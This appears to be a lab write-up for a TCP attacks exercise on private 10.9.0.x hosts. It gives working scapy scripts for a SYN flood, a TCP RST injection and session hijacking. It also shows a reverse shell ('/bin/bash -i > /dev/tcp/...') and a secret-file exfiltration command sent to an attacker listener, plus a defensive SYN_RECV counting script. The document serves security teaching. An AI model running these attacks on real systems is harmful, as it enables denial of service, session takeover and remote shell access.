Contents
- Starting the environment
- Task 1.1: Launching the Attack Using Python
- Task 1.2: Launch the Attack Using C
- Task 2: TCP RST Attacks on telnet Connections
- Task 3: TCP Session Hijacking
- Task 4: Creating Reverse Shell using TCP Session Hijacking
Starting the environment

Task 1.1: Launching the Attack Using Python
Check the connection state before the attack:
netstat -tna

#!/usr/bin/env python3
from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
from random import getrandbits

ip = IP(dst="10.9.0.5")
tcp = TCP(dport=23, flags='S')
pkt = ip/tcp
while True:
    pkt[IP].src = str(IPv4Address(getrandbits(32)))  # random source IP
    pkt[TCP].sport = getrandbits(16)                 # random source port
    pkt[TCP].seq = getrandbits(32)                   # random sequence number
    send(pkt, verbose=0)

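Let the attack run for at least one minute, then try to log in to the victim machine and see whether you succeed. Your attack will quite likely fail. Here, on the victim host, many half-open connections are visible.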
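
An added example, not part of the original post: a defender-side check that parses `netstat -tna` output and counts the half-open (SYN_RECV) connections described above, per local port and per distinct source address. The sample output, the function names and the default threshold of 128 are constructed assumptions for illustration.

```python
#!/usr/bin/env python3
"""Count half-open (SYN_RECV) TCP connections in `netstat -tna` output."""
from collections import defaultdict

# Constructed sample of `netstat -tna` output on the victim (not captured data).
SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 10.9.0.5:23             203.0.113.7:4412        SYN_RECV
tcp        0      0 10.9.0.5:23             198.51.100.20:51000     SYN_RECV
tcp        0      0 10.9.0.5:23             192.0.2.99:1025         SYN_RECV
tcp        0      0 10.9.0.5:23             10.9.0.6:36030          ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN
"""


def half_open_by_port(netstat_text):
    """Return {local_port: {"count": n, "sources": number of distinct remote IPs}}."""
    stats = defaultdict(lambda: {"count": 0, "sources": set()})
    for line in netstat_text.splitlines():
        fields = line.split()
        # Data rows have six columns: proto, recv-q, send-q, local, foreign, state.
        if len(fields) != 6 or not fields[0].startswith("tcp"):
            continue
        local, foreign, state = fields[3], fields[4], fields[5]
        if state != "SYN_RECV":
            continue
        port = int(local.rsplit(":", 1)[1])  # rsplit also copes with IPv6 addresses
        stats[port]["count"] += 1
        stats[port]["sources"].add(foreign.rsplit(":", 1)[0])
    return {p: {"count": s["count"], "sources": len(s["sources"])}
            for p, s in stats.items()}


def flooded_ports(netstat_text, threshold=128):
    """Ports whose half-open count reaches the threshold (assumed value, tune per host)."""
    return sorted(p for p, s in half_open_by_port(netstat_text).items()
                  if s["count"] >= threshold)


if __name__ == "__main__":
    for port, s in sorted(half_open_by_port(SAMPLE).items()):
        print(f"port {port}: {s['count']} half-open from {s['sources']} sources")
    print("flooded:", flooded_ports(SAMPLE, threshold=3))
```

A port with many SYN_RECV entries spread over many distinct sources matches the randomized-source flood shown above.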

Task 1.2: Launch the Attack Using C
Task 2: TCP RST Attacks on telnet Connections
On 10.9.0.6, telnet to 10.9.0.7 and capture the traffic with Wireshark.



Based on the captured packet sent from 10.9.0.7 to 10.9.0.6, modify the Python file as follows:
#!/usr/bin/env python3
from scapy.all import *
ip = IP(src="10.9.0.6", dst="10.9.0.7")
tcp = TCP(sport=36030, dport=23, flags="R", seq=1574683417, ack=2506752736)
pkt = ip/tcp
ls(pkt)
send(pkt,verbose=0)
The connection to 10.9.0.7 is now broken.

Task 3: TCP Session Hijacking
Modify the code and add data (any hexadecimal string):
#!/usr/bin/env python3
from scapy.all import *
ip = IP(src="10.9.0.6", dst="10.9.0.7")
# ACK flag, as in Task 4: an RST would tear the session down instead of delivering the data
tcp = TCP(sport=36074, dport=23, flags="A", seq=2758682726, ack=3314205569)
data="68656c6c6f20776f726c64"
pkt = ip/tcp/data
ls(pkt)
send(pkt,verbose=0)


Task 4: Creating Reverse Shell using TCP Session Hijacking
Attacker machine: 10.9.0.7
nc -lv 9090
Start a listener on the attacker machine.

Victim machine: 10.9.0.5
cat /home/seed/secret> /dev/tcp/10.9.0.7/9090
$ /bin/bash -i > /dev/tcp/10.9.0.7/9090 0<&1 2>&1
Then telnet from 10.9.0.6 to 10.9.0.5, capture the packets, and obtain the parameters as follows:
#!/usr/bin/env python3
from scapy.all import *
print("SENDING SESSION HIJACKING PACKET.........")
IPLayer = IP(src="10.9.0.6", dst="10.9.0.5")
# Parameters of the TCP packet sent from 10.9.0.6 to 10.9.0.5
TCPLayer = TCP(sport=48852, dport=23, flags="A", seq=3017821363, ack=2102281185)
Data = "\r cat /home/seed/secret > /dev/tcp/10.9.0.7/9090\r"
pkt = IPLayer/TCPLayer/Data
ls(pkt)
send(pkt,verbose=0)
# Transmission Control Protocol, Src Port: 48852, Dst Port: 23, Seq: 3017821363, Ack: 2102281185, Len: 0


The attacker obtains a shell and can execute commands on the victim server.

